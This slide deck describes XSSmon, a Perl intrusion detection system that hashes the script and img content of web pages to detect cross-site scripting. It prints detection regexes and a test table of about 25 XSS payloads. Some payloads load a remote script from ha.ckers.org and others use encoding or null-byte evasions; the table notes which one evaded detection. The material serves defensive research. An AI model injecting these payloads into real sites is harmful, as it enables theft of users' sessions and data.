This document describes an XSSmon IDS that uses regular expressions to detect potential cross-site scripting (XSS) attacks by extracting executable content from web pages and computing SHA-1 hashes. It was tested on web pages with unmodified, modified, and malicious content, detecting changes when executable code was added but not when only HTML was added. The IDS successfully detected most XSS attack vectors but not one using a null character. Overall, the proof of concept suggests robust XSS monitoring could help mitigate risks from vulnerabilities.
XSSmon: A Perl Based IDS for the Detection of Potential XSS Attacks
1. XSSmon: A Perl Based IDS for the Detection of Potential XSS Attacks
Christopher M. Frenz
2. Cross Site Scripting
Cross Site Scripting (XSS) entails the
injection of a malicious script into a Web
site so that when a future user accesses
the Web site, the script is executed by the
browser of the client machine
In OWASP’s 2010 survey of the 10 greatest
application security risks, injection attacks
were ranked #1 and XSS attacks were
ranked as #2
3. Common XSS Defenses
Escaping
Converting < to &lt; to render content contained
in <script></script> tags non-executable
Validation
Whitelisting
(\s?\(?\d{3}\)?[-\s.]?\d{3}[-.]\d{4})
Blacklisting
((%3C)|<).*?((%3E)|>)
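The three defenses on this slide can be sketched in a few lines of Python (the deck's own tool is written in Perl; Python is used here only for illustration). This is a minimal sketch, assuming the whitelist pattern is meant to match a US-style phone number and that the blacklist pattern should ignore case. The function names `escape`, `is_phone`, and `looks_like_tag` are hypothetical.

```python
import html
import re

# Whitelist: accept only input that fully matches a known-good shape
# (assumed here to be a US-style phone number).
PHONE = re.compile(r"\s?\(?\d{3}\)?[-\s.]?\d{3}[-.]\d{4}")

# Blacklist: flag input containing anything that looks like a tag,
# whether the angle brackets are literal or URL-encoded.
# Case-insensitive matching is an assumption of this sketch.
TAG = re.compile(r"((%3C)|<).*?((%3E)|>)", re.IGNORECASE)


def escape(text):
    """Escaping: turn <, >, & and quotes into HTML character references."""
    return html.escape(text)


def is_phone(text):
    """Whitelisting: True only if the whole input matches the pattern."""
    return PHONE.fullmatch(text) is not None


def looks_like_tag(text):
    """Blacklisting: True if the input contains a tag-like sequence."""
    return TAG.search(text) is not None
```

Whitelisting rejects everything that is not explicitly allowed, while blacklisting only catches the patterns someone thought to list, which is why a monitor for breached defenses is still useful.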
4. Project Goal
This study does not seek to build on the
existing methods of XSS prevention and
mitigation, but rather seeks to take
advantage of the ability of regular
expressions to detect XSS elements as a
means of developing an XSS intrusion
detection system, in order to allow the
detection of any breach of XSS defenses.
5. Hashes
One-way cryptographic function in which each input
should yield a unique output
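As a small illustration, SHA-1 (the hash used later in the deck) can be computed with Python's standard `hashlib` module. This is only a sketch; the helper name `sha1_hex` is hypothetical. Because the digest has a fixed length, uniqueness is a design goal rather than a guarantee.

```python
import hashlib


def sha1_hex(data):
    """Return the SHA-1 digest of a text string as 40 hex characters."""
    return hashlib.sha1(data.encode("utf-8")).hexdigest()


# A one-character change in the input gives an unrelated digest.
print(sha1_hex("abc"))
print(sha1_hex("abd"))
```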
7. Tripwire
Tripwire works by having the application user
select critical system files and computing a hash of
those system files to establish a baseline
At some future point in time, the hashes of those
selected files can be recomputed
If the file was not modified in any way the hash
value that pertains to the file will remain
unchanged
If a recomputed hash value is found to differ from
the baseline value, it is indicative that the file has
in some way been modified, which could be
indicative of a potential attack on the system
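The baseline-and-recheck idea can be sketched as follows. This is not Tripwire's actual implementation, only a minimal Python illustration of the workflow described above, and the function names are hypothetical.

```python
import hashlib
from pathlib import Path


def file_sha1(path):
    """Hash the raw bytes of one file."""
    return hashlib.sha1(Path(path).read_bytes()).hexdigest()


def take_baseline(paths):
    """Record a digest for every selected file."""
    return {str(p): file_sha1(p) for p in paths}


def changed_files(baseline):
    """Recompute each digest and report files that no longer match."""
    return [p for p, digest in baseline.items() if file_sha1(p) != digest]
```

A typical use would be to store the result of `take_baseline` somewhere safe and call `changed_files` on a schedule; any path it returns has been modified since the baseline was taken.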
8. XSSmon IDS
This XSS IDS is a variation on the theme laid forth by
Tripwire in that it seeks to use regular expressions to
identify all of the possible client side executable
content in a Web page
Script Regex
((<|%3C)(s|%73|%53)(c|%63|%43)(r|%72|%52)(i|%69|%49)(p|%70|%50)(t|%74|%54).*?(<|%3C)(/|%2F)(s|%73|%53)(c|%63|%43)(r|%72|%52)(i|%69|%49)(p|%70|%50)(t|%74|%54)(>|%3E))
Img Regex
((<|%3C)(i|%69|%49)(m|%6D|%4D)(g|%67|%47).*?(>|%3E))
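To see what these two patterns capture, here is a Python transcription (the original tool is Perl). It is a sketch under stated assumptions: each letter group is taken to list the literal letter plus its two URL-encoded forms, so `(r|%72|%52)` and `(t|%74|%54)`. The case-insensitive and dot-matches-newline flags are also assumptions, since the slides do not show the regex modifiers. `find_executable` is a hypothetical helper name.

```python
import re

FLAGS = re.IGNORECASE | re.DOTALL  # assumed modifiers, not shown on the slide

SCRIPT_RE = re.compile(
    r"((<|%3C)(s|%73|%53)(c|%63|%43)(r|%72|%52)(i|%69|%49)(p|%70|%50)(t|%74|%54)"
    r".*?"
    r"(<|%3C)(/|%2F)(s|%73|%53)(c|%63|%43)(r|%72|%52)(i|%69|%49)(p|%70|%50)"
    r"(t|%74|%54)(>|%3E))",
    FLAGS,
)
IMG_RE = re.compile(r"((<|%3C)(i|%69|%49)(m|%6D|%4D)(g|%67|%47).*?(>|%3E))", FLAGS)


def find_executable(page):
    """Return every script block, then every img tag, found in the page."""
    scripts = [m.group(1) for m in SCRIPT_RE.finditer(page)]
    images = [m.group(1) for m in IMG_RE.finditer(page)]
    return scripts + images
```

Group 1 is the outermost parenthesis in each pattern, so it holds the whole matched tag, including any URL-encoded brackets.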
9. XSSmon Methods
It is the intention of this application to only recognize
potentially executable content, so that “harmless”
content, such as plain non-executable text enclosed
in <p> tags and the like, does not trigger the system
every time it is added to a page
The IDS can be presented with a list of Web page
links to monitor, and will use the regular expressions to
globally match all of the content encapsulated in
<script> or <img> tags
All of this content is then concatenated together into
a string that contains all the content recognized as
potentially executable, and the string is passed through
a SHA1 hash.
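The extract, concatenate, and hash steps might look like this in Python. It is a simplified sketch, not the Perl code of the IDS itself: the two patterns are plain-tag stand-ins for the full regular expressions, and the helper names, the UTF-8 decoding, and the use of `urllib` to fetch pages are all assumptions.

```python
import hashlib
import re
from urllib.request import urlopen

# Simplified stand-ins for the script and img patterns.
PATTERNS = [
    re.compile(r"<script.*?</script>", re.IGNORECASE | re.DOTALL),
    re.compile(r"<img.*?>", re.IGNORECASE | re.DOTALL),
]


def extract_executable(page):
    """Globally match every pattern and join the matches into one string."""
    parts = []
    for pattern in PATTERNS:
        parts.extend(pattern.findall(page))
    return "".join(parts)


def fingerprint(page):
    """SHA-1 of only the potentially executable content of a page."""
    return hashlib.sha1(extract_executable(page).encode("utf-8")).hexdigest()


def fingerprint_url(url):
    """Fetch a monitored link and fingerprint its body."""
    with urlopen(url) as response:
        page = response.read().decode("utf-8", errors="replace")
    return fingerprint(page)
```

Because only the matched content feeds the hash, adding a `<p>` paragraph leaves the fingerprint unchanged, while adding a `<script>` or `<img>` tag changes it.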
10. HTML Page with Executable Content
Potentially executable content is extracted and
used as input to SHA-1 hash
At a later point in time the content will be
re-extracted and put through the hash function again
11. Test #1
To test the efficacy of the IDS system, three
identical Web pages (XSSTest, XSSTest2, XSSTest3)
are initially created that contain a mixture of
standard HTML tags and a simple JavaScript that
displays the current date in the browser window
These HTML pages are then uploaded to an Apache
Web server and the corresponding links input into
the XSS IDS program
The XSS IDS baseline module is then used to
compute the SHA1 hash values of the executable
content in the Web page present at each link
12. Test 1: Initial Hash Values
The three identical Web pages yield identical hash values
13. Test 1 Continued
The 3 HTML files will be modified as follows:
the XSSTest.html file will have additional
executable content added to it
the XSSTest2.html file will have additional html
content added to it, but no additional client side
executable content added
XSSTest3.html will remain unmodified as a control
After the files are modified (as above) the module
of the XSS IDS application that recomputes the
hashes and performs comparisons to the values
stored in the database will be executed
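The test procedure can be mimicked in memory with a short Python sketch. Everything here is illustrative: the page contents are made up, a dictionary stands in for the database, and the combined pattern is a simplified stand-in for the IDS regular expressions.

```python
import hashlib
import re

# Simplified stand-in for the script and img patterns.
EXECUTABLE = re.compile(r"<script.*?</script>|<img.*?>", re.IGNORECASE | re.DOTALL)


def fingerprint(page):
    content = "".join(EXECUTABLE.findall(page))
    return hashlib.sha1(content.encode("utf-8")).hexdigest()


def baseline(pages):
    """Baseline module: store one hash per monitored page."""
    return {name: fingerprint(body) for name, body in pages.items()}


def recheck(stored, pages):
    """Comparison module: names of pages whose hash no longer matches."""
    return sorted(n for n, body in pages.items() if fingerprint(body) != stored[n])


# Hypothetical page: standard HTML plus a script that shows the date.
original = ("<html><body><p>Today is:</p>"
            "<script>document.write(Date())</script></body></html>")
pages = {name: original for name in
         ("XSSTest.html", "XSSTest2.html", "XSSTest3.html")}
stored = baseline(pages)

# XSSTest gains executable content, XSSTest2 gains plain HTML,
# XSSTest3 stays unmodified as the control.
pages["XSSTest.html"] = original.replace(
    "</body>", "<script>alert('XSS')</script></body>")
pages["XSSTest2.html"] = original.replace(
    "</body>", "<p>A new comment</p></body>")

alerts = recheck(stored, pages)
print(alerts)
```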
15. Test 1 Conclusions
The Web page with additional executable
content was detected
Those without additional executable content
did not trigger the IDS
This would make the IDS useful for any type of
Web forum or Web site that allows the posting
of comments or other user content, since the
IDS would not trigger false alarms for every
addition to a Web page; only additions that
match the potentially executable content
patterns laid forth in the application's regular
expressions
16. Test 2
The IDS was then further tested by
determining how well it picks up a large
variety of XSS attack vectors
Each of these attack vectors was inserted
into an html Web page whose baseline
value had been previously computed
After the insertion, the hashes were
recomputed and compared to the
baseline values
17. XSS Attack Vector, Detected (Yes/No)
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> Yes
<IMG SRC="javascript:alert('XSS');"> Yes
<img SRC=javascript:alert('jXSS')> Yes
<IMG SRC=JaVaScRiPt:alert('XSS')> Yes
<IMG SRC=javascript:alert("XSS")> Yes
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> Yes
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> Yes
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> Yes
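<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> Yes
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> Yes
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> Yes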
<IMG SRC="jav ascript:alert('XSS');"> Yes
<IMG SRC="jav&#x09;ascript:alert('XSS');"> Yes
<IMG SRC="jav&#x0A;ascript:alert('XSS');"> Yes
<IMG SRC="jav&#x0D;ascript:alert('XSS');"> Yes
<IMG SRC="javascript:alert('XSS');"> - Each character on a new line Yes
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out Yes
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out No
<IMG SRC="  javascript:alert('XSS');"> Yes
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> Yes
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> Yes
<<SCRIPT>alert("XSS");//<</SCRIPT> Yes
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<SCRIPT SRC=//ha.ckers.org/.j> Yes
<IMG SRC="javascript:alert('XSS')" Yes
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT> Yes
</TITLE><SCRIPT>alert("XSS");</SCRIPT> Yes
18. Test 2 Conclusions
In all but one case the hash values for the
HTML pages changed, demonstrating the
efficacy of the IDS in detecting XSS
attacks
The one XSS attack vector that went
undetected contained a null character
(\0) in the script tag, which made the tag
unrecognizable to the IDS
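The miss is easy to reproduce with a simplified pattern. The Python sketch below uses a stand-in regex rather than the IDS's own expressions. The `strip_nulls` helper is a hypothetical pre-processing step that the slides do not propose; it is included only to show why the null byte is what defeats the match.

```python
import re

# Simplified stand-in for the script pattern.
SCRIPT = re.compile(r"<script.*?</script>", re.IGNORECASE | re.DOTALL)

plain = '<SCRIPT>alert("XSS")</SCRIPT>'
with_null = '<SCR\x00IPT>alert("XSS")</SCR\x00IPT>'


def strip_nulls(text):
    """Remove null bytes before matching (an assumed normalization step)."""
    return text.replace("\x00", "")


print(bool(SCRIPT.search(plain)))                   # tag is recognized
print(bool(SCRIPT.search(with_null)))               # null byte splits "SCRIPT"
print(bool(SCRIPT.search(strip_nulls(with_null))))  # recognized after stripping
```

The pattern looks for the letters of "script" as a contiguous run, so a byte inserted between "SCR" and "IPT" breaks the match even though some browsers of the era ignored the null and still executed the script.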
19. Overall Conclusion
While the XSS IDS presented in this manuscript is still at a
stage where much more rigorous testing needs to be
applied to it to see how well it detects XSS attacks
against the breadth of all possible XSS attacks on a
diversity of different Web pages, the proof of concept
presented here is strongly suggestive that the creation
of an XSS IDS is entirely feasible. Moreover, a robust XSS
IDS would be an excellent tool for Web application security,
because no matter how securely a piece of software is
written, bugs will still exist in it. An IDS such as this can
help to mitigate the potential damage that could be
unleashed by a bit of malicious XSS code slipping past a
Web application’s input validation and escaping
defenses by providing an early warning that such a
condition exists.